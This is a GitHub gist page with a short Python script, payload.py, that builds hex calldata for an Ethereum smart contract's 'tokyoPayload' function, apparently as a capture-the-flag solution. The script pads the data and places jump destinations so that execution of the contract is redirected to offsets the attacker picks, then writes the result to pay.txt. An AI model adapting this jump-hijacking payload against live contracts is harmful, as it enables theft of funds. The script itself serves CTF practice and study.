Skip to content

Instantly share code, notes, and snippets.

@kangsangsoo

kangsangsoo/payload.py

Created September 22, 2023 07:32
Show Gist options
  • Save kangsangsoo/d93036176b74d0e6898c0d3c3ca8ea29 to your computer and use it in GitHub Desktop.
Save kangsangsoo/d93036176b74d0e6898c0d3c3ca8ea29 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
payload.py
JUMPDEST_RET_FUNCS = "018f"
JUMPDEST_LOAD = "d0"
DUMMY = "DE"
SIG_tokyoPayload = "000040c3"
payload = SIG_tokyoPayload # func sig
payload += "7b".rjust(64, "0") # x
payload += JUMPDEST_LOAD.rjust(64, "0") # y => first call pointer and second call addr
payload += DUMMY * 1 # align
payload += DUMMY * (int(JUMPDEST_RET_FUNCS, 16) - len(payload) // 2)
payload += "11".rjust(64, "0")
payload += "22".rjust(64, "0") # third call
payload += "33".rjust(64, "0") # second call's arg0
payload += DUMMY * ((int(JUMPDEST_LOAD, 16)) * 0x20 - len(payload) // 2 + 5)
assert len(payload) // 2 == (int(JUMPDEST_LOAD, 16))* 0x20 + 5
payload += JUMPDEST_LOAD.rjust(64, "0") # first call addr
open("pay.txt","w").write(payload)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment